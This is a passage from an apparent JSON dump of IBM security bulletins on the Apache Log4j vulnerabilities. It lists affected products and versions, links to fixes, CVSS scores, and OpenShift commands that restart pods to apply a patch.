imagePullPolicy:\n\nIf the value of `imagePullPolicy` is not set to \u201cAlways\u201d :\n\noc patch iscinventory iscplatform --type merge --patch 
'{\"spec\":{\"definitions\":{\"imagePullPolicy\": \"Always\"}}}' && oc delete pod -lname=sequences\n\nElse if the value of the `imagePullPolicy` is already set to \u201cAlways\u201d : \n\noc delete pod -lsequence=idrmapp\n\nAfter executing either of the above commands the idrm pods will restart which can be monitored using :\n\noc get pods -w\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nRHSB-2021-009 Log4Shell - Remote Code Execution - log4j (CVE-2021-44228) (CVE-2021-4104) <https://access.redhat.com/security/vulnerabilities/RHSB-2021-009>\n\nX-Force Database: <https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>\n\nElastic Search: <https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476>\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSTDPP\",\"label\":\"IBM Cloud Pak for Security\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF040\",\"label\":\"RedHat OpenShift\"}],\"Version\":\"1.9.0.0, 1.8.1.0, 1.8.0.0, 1.7.2.0 \",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-17T11:34:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects Cloud Pak for Security (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", 
"integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-01-17T11:34:23", "id": "CE6A6F0970C169F7DBE65AA5DFCFCEC0BEA99E837906D043FD4B6D3BF7A87D67", "href": "https://www.ibm.com/support/pages/node/6527154", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-06T21:48:20", "description": "## Summary\n\nWebSphere Application Server is shipped with WebSphere Remote Server. Information about security vulnerabilities affecting WebSphere Application Server have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM WebSphere Remote Server - Product Family| All \n \n\n\n## Remediation/Fixes\n\nRefer to the following security bulletins for vulnerability details and information about fixes addressed by WebSphere Application Server which is shipped with WebSphere Remote Server. 
\n \n\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version**\n\n| \n\n**Affected Supporting Product Security Bulletin** \n \n---|---|--- \n \nWebSphere Remote Server \n9.0, 8.5, 7.1, 7.0\n\n| \n\nWebSphere Application Server 9.0, 8.5, 8.0\n\n| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750>) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSUNCX\",\"label\":\"WebSphere Remote Server\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"9.0, 8.5, 7.1, 7.0 \",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T16:41:40", "type": "ibm", "title": "Security Bulletin: Multiple Vulnerabilities have been identified in WebSphere Application Server shipped with WebSphere Remote Server", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2021-12-17T16:41:40", "id": "0B62A979A39E5FDD103EF50E44280DC84E1DA4B8937991D39D2F70B94DE5CDC6", "href": 
"https://www.ibm.com/support/pages/node/6527932", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-01-13T23:33:04", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped with IBM Security Identity Manager (ISIM). Information about security vulnerabilities affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nISIM| 6.0.0 \nISIM| 6.0.2 \nIBM Security Verify Governance, Identity Manager software component| All \n \n\n\n## Remediation/Fixes\n\nPrincipal Product and Version(s)| Affected Supporting Product and Version(s)| Affected Supporting Product Security Bulletin \n---|---|--- \nISIM 6.0.0 | WAS 7.0, 8.5| \n\n# [Security Bulletin:Multiple vulnerabilities in Apache Log4j affects WebSphere Application Server traditional(CVE-2021-4104,CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin:Multiple vulnerabilities in Apache Log4j affects WebSphere Application Server traditional\\(CVE-2021-4104,CVE-2021-45046\\)\" ) \n \nISIM 6.0.2, \n\nIBM Security Verify Governance, Identity Manager software component \n\n| WAS 9.0 \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response 
Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n12 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSRMWJ\",\"label\":\"IBM Security Identity Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF027\",\"label\":\"Solaris\"}],\"Version\":\"ISIM 6.0, ISIM 6.0.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-12T19:29:05", "type": "ibm", "title": "Security Bulletin:Security vulnerabilities have been identified in IBM WebSphere 
Application Server shipped with IBM Security Identity Manager", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-12T19:29:05", "id": "CA643463AA3DD27CF347651D7B084BEA39601B3E21A99AD0FE90A4163037F126", "href": "https://www.ibm.com/support/pages/node/6540290", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T23:44:53", "description": "## Summary\n\nThis bulletin provides information for addressing the Apache Log4j vulnerabilities (CVE-2021-4104, CVE-2021-45046) in IBM Workload Scheduler by remediating the vulnerabilities in IBM WebSphere Application Server (WAS) and IBM WebSphere Application Server Liberty.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Workload Scheduler| 9.5 \nIBM Workload Scheduler| 9.4 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now. 
\n**\n\nRefer to the following security bulletin for vulnerability details and information about fixes addressed by IBM WebSphere Application Server and IBM WebSphere Application Server Liberty which are shipped with IBM Workload Scheduler.\n\n<https://www.ibm.com/support/pages/node/6526750>\n\n * Implementing the Remediation/Fixes detailed in the WAS bulletin addresses the vulnerabilities for the IBM Workload Scheduler versions listed in the Affected Products/Versions section. Note that IWS 9.5 Liberty is not configured with features zosConnect-1.0 and zosConnect-1.2 so it is not affected.\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSGSPN\",\"label\":\"IBM Workload Scheduler\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"9.4 9.5\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-10T09:19:17", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities in Apache Log4j impact IBM Workload Scheduler (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-10T09:19:17", "id": "C2D7FDE6929D1789B9A1618D087E5DCB3FC2780B2EC1CA3CFF40FDF3AD014A8E", "href": "https://www.ibm.com/support/pages/node/6539426", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-01-11T13:42:05", "description": "## Summary\n\nIBM WebSphere Application Server is shipped with IBM Tivoli Federated Identity Manager. Information about security vulnerabilities (CVE-2021-4104, CVE-2021-45046) affecting IBM WebSphere Application Server have been published in a security bulletin. \n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Tivoli Federated Identity Manager| 6.2.0 - 6.2.2 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading. Refer to the following security bulletins for vulnerability details and information about fixes addressed by IBM WebSphere Application Server which is/are shipped with IBM Tivoli Federated Identity Manager. 
\n\n**Principal Product and Version(s)**\n\n| \n\n**Affected Supporting Product and Version**\n\n| \n\n**Affected Supporting Product Security Bulletin** \n \n---|---|--- \nIBM Tivoli Federated Identity Manager 6.2.0 - 6.2.2| IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0| \n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n07 Jan 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU008\",\"label\":\"Security\"},\"Product\":{\"code\":\"SSZSXU\",\"label\":\"Tivoli Federated Identity Manager\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"6.2.x\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-10T18:33:41", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Federated Identity Manager is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-4104,\u00a0 CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, 
"vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-01-10T18:33:41", "id": "73EAFB98AF656367DD4CBD6C4D9BDB98FBF39B358F625D93589F37D52771AA8D", "href": "https://www.ibm.com/support/pages/node/6539538", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-16T23:45:11", "description": "## Summary\n\nVulnerabilities in Apache Log4j (CVE-2021-4104, CVE-2021-45046) impact IBM WebSphere Application Server shipped with IBM Security Access Manager for Enterprise Single Sign-On. The fix addresses the vulnerabilities by removing Apache Log4j.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Security Access Manager for Enterprise Single-Sign On| 8.2.0, 8.2.1, 8.2.2 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.0| IBM WebSphere Application Server 7.0| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.1| IBM WebSphere Application Server 7.0, 8.5| [Security Bulletin: Multiple vulnerabilities in Apache log4j 
affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \nIBM Security Access Manager for Enterprise Single Sign-On 8.2.2| IBM WebSphere Application Server 8.5| [Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n08 Mar 2022: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SS9JLE\",\"label\":\"IBM Security Access Manager for Enterprise Single Sign-On\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"8.2.0, 8.2.1, 8.2.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.0, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T03:25:30", "type": "ibm", "title": "Security Bulletin: IBM Security Access Manager for Enterprise Single Sign-On is vulnerable to arbitrary code execution due to Apache Log4j (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 
"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-45046"], "modified": "2022-03-16T03:25:30", "id": "30A0E9F889B3548B9BD0339A7DD9F4F3D51821FE906234D247C17BB05B831873", "href": "https://www.ibm.com/support/pages/node/6563859", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-03-18T23:36:20", "description": "## Summary\n\nIBM WebSphere Application Server is a required product for IBM Tivoli Netcool Configuration Manager version 6.4.2. Information about a security vulnerability affecting IBM WebSphere Application Server has been published in a security bulletin.\n\n## Vulnerability Details\n\nRefer to the security bulletin(s) listed in the Remediation/Fixes section\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNCM| 6.4.2 \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nITNCM| 6.4.2| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty\" )\n\nSee section: For V9.0.0.0 through 9.0.5.10 :\n\nSee section: For V8.5.0.0 through 8.5.5.20 :\n\nSee section: For V8.0.0.0 through 8.0.0.15 :\n\nSee section: For V7.0.0.0 through 7.0.0.45 : \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### 